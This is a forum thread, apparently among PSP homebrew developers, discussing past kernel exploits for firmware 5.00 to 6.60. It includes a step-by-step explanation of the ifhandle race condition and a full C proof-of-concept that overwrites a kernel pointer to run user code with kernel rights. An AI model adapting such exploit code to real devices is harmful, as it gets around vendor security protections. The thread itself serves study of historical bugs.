How many kexploits have been published? 4 or more?

[jigsaw]

I've been working on compiling a list of the previous exploits as a learning resource so if you need to know any details on an exploit, feel free to ask.

May you post a sample (hello k-world) for 5.03/psheet?

Freddy has explained here:

viewtopic.php?p=2022#p2022

[Dovahkiin]

@Davee does psheet kxploit exist on 5.00 also is ifhandle from 5.70 and ifhandle from 6.60 are they related/one or different?

[FrEdDy]

@Davee does psheet kxploit exist on 5.00 also is ifhandle from 5.70 and ifhandle from 6.60 are they related/one or different?

I hope you don't mind if I answer instead of Davee.
Yes, the psheet exploit exists on 5.00, and the 5.70 ifhandle exploit was different from the 6.60 one, AFAIK (I may have a different exploit, ifhandle was pretty buggy back then )

[Davee]

The 5.70 ifhandle actually exists from 5.00 times. I posted it on IRC when I found out it was patched on 6.20. It's a race condition exploit where the input linked list is searched for kernel addresses. What you you do is:

[ Data #1 ]
[ Data #2 ]

Have two data structures and link #1 to #2 and then #2 back onto itself so you have a circular loop. Create a second thread and let it sleep for a second or two and let the creator call a chosen ifhandle function with this structure. Now, when the created thread resumes, Data #1 will have been checked for kernel addresses and now it's constantly checking #2. This is the easy part now, link #1 to NULL, add kernel addresses into #1 and then when you want the other thread to resume proper execution, just link #2 to NULL.

After that, the syscall thread will resume thinking it has checked for addresses but in reality, the list has kernel addresses and you can do what you want.
The bug is a design flaw in the module, really nice exploit, probably my favourite next to the other ifhandle one.

I'd show the code, but I dont have it handy, if anybody else does, feel free to show it.

[jigsaw]

@Davee

570 is really beautiful. If by "the other ifhandler one" you mean the one published in 660, IMO 570 is way better.

[Draan]

I'd show the code, but I dont have it handy, if anybody else does, feel free to show it.

Here ya go, something I and n00b81 cooked together back then:

Code: Select all

//5.50 ifhandle PoC
typedef struct IfhandleParam {
   struct IfhandleParam * next;
   u32 unk1;
   void * data;
   u32 data_size;
   u16 unk2;
   u16 check;
   char unusedstuff[48];
   void * data2;
   void * addr3;
} IfhandleParam;

int ksploitmain2();

int _ksploitmain(int arg1, int arg2)
{
   return ksploitmain2();
}
int dummy()
{
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");
   asm("nop");   
   asm("nop");
}

int ksploitmain2()
{
   //your kernel stuff here
}

int lolthread(SceSize argsize, u32 *argp)
{
      IfhandleParam *param_one = argp[0];
      IfhandleParam *param_two = argp[1];

      sceKernelDelayThread(2 * 1000 * 1000);

      param_one->next = NULL;
      param_one->check = 5; //a random value which passes an additional check in Sony's code. Nothing important, really
      param_two->next = NULL; // stop the loop!

      sceKernelDelayThread(1 * 1000 * 1000);

      return 0;
}

//main user function
void _start()
{
   dummy(); //call dummy so GCC won't trash it
   sceKernelDcacheWritebackInvalidateAll();
   SceUID pthid = sceKernelCreateThread("lol", (void *)lolthread, 0xC, 0x1000, 0, NULL);
    u32 args[2];

    IfhandleParam param[2];
   memset(&param, 0, sizeof(param));

    param[0].next = &param[1];
    param[1].next = &param[1];

    param[0].data = 1;       
    param[0].data_size = 1;

    param[1].data = 1;
    param[1].data_size = 1;
   
   //IIRC it's a pointer addr, called by sceKernelLibcGettimeofday
   //The Sony code was adding 0x48 to the addr before writting via "sw", so we substract it here to get valid addr
   //The Sony code do another "sw" around ksploitmain addr. I've added that dummy function to make sure this operation
   //won't destroy something important for us
    param[0].data2 = (void *) 0x88013B14 - 0x48;
    param[0].addr3 = (void *) &_ksploitmain;

    args[0] = &param[0];
    args[1] = &param[1];

    sceKernelStartThread(pthid, sizeof(args), args);

    sceNetMFree(&param[0]);
   
   sceKernelLibcGettimeofday((void *) 0x08800001, (void *) 0x08800002); //random args -> jump into our code with kernel rights!
    sceKernelDelayThread(2 * 1000 * 1000);

    //back to VSH
    sceKernelExitGame();
}